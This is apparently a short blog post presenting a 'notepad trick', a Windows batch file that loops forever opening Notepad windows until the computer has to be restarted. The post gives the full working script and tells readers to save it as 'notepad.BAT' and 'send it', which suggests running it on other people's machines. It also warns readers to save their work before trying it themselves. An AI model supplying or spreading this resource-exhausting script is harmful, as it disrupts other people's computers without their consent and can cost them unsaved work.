When you type the below code and rename it as *.bat it take the above showed icon shape.
Notepad Trick |
Type the code in notepad as :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO topSave it as “notepad.BAT” and send it.
Note: If you want to try it, then go ahead and when you built this file double click to open it. But beware it slows your system and you will be left with no other option than to restart your System, as this script opens 100’s of notepad window. So, If you want to try this than save all your work and then run this file.
Do you have questions, comments, or suggestions? Feel free to post a comment!
No comments:
Post a Comment